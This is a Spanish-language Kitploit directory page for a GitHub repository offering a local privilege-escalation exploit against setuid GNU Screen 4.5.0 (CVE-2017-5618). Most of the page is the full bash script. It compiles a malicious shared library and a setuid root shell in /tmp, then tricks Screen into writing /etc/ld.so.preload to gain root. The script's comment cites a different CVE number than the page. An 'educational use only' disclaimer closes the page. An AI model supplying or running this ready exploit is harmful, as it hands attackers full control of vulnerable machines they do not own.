Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2017-5618-Screen-4.5.0-Root — Exploit de escalada de privilegios local para GNU Screen 4.5.0 (CVE-2017-5618). Explota una vulnerabilidad en la función de registro para secuestrar la carga de bibliotecas compartidas y obtener acceso root mediante la manipulación de ld.so.preload. Vulnerable: Screen 4.5.0 (SUID) Corregido en: Screen 4.6.0+ | Kitploit
Herramientas/GitHubGitHub/rxdarkee/cve-2017-5618-screen-4.5.0-root
Escalada de PrivilegiosExplotaciónPruebas de PenetraciónAprendizaje y EducaciónExplotación de BinariosLabs y Práctica
GitHubrxdarkee/cve-2017-5618-screen-4.5.0-root

CVE-2017-5618-Screen-4.5.0-Root

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Exploit de escalada de privilegios local para GNU Screen 4.5.0 (CVE-2017-5618). Explota una vulnerabilidad en la función de registro para secuestrar la carga de bibliotecas compartidas y obtener acceso root mediante la manipulación de ld.so.preload. Vulnerable: Screen 4.5.0 (SUID) Corregido en: Screen 4.6.0+

32hace 11 mesesAún no revisado
Compartir

Exploit de escalada de privilegios local para GNU Screen 4.5.0 (CVE-2017-5618)

📌 Resumen

Exploit de escalada de privilegios local para GNU Screen 4.5.0 que secuestra la carga de bibliotecas compartidas para obtener acceso root mediante la manipulación de ld.so.preload.

🔧 Detalles técnicos

Vulnerabilidad: CVE-2017-5618

Tipo: Secuestro de bibliotecas compartidas mediante ld.so.preload

Afectado: GNU Screen 4.5.0 exclusivamente

Corregido en: GNU Screen 4.6.0+

🎪 El circo de la vulnerabilidad

CVE: 2017-5618 🎯

El bug: Screen 4.5.0 crea archivos de log con permisos PELIGROSOS

La magia: Lo engañamos para que cree /etc/ld.so.preload que carga nuestra biblioteca maliciosa

El payload: ¡Shell root instantánea! 🐚

Script 🗒️

root@kitploit:~
#!/bin/bash
# exploit.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# CVE-2016-8781
# tested on debian jessie (8.6) with screen 4.5.
# 0xHackers - Darke
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" 
echo "[+] Triggering..."
screen -ls 
/tmp/rootshell
            

Capturas de pantalla

Comprobando la versión vulnerable de Screen.

Versión de Screen detectada

Creando el archivo y otorgando los permisos necesarios.

Creando

Acceso root obtenido.

Root

Shell root obtenida: control total del sistema.

⚠️ Etiqueta de advertencia

¡SOLO PARA USO EDUCATIVO! ⚠️ No seas un script kiddie: úsalo solo en sistemas que te pertenezcan o en los que tengas permiso explícito para probar.

Probado en

TryHackMe KOTH Room - Food

Descargar herramienta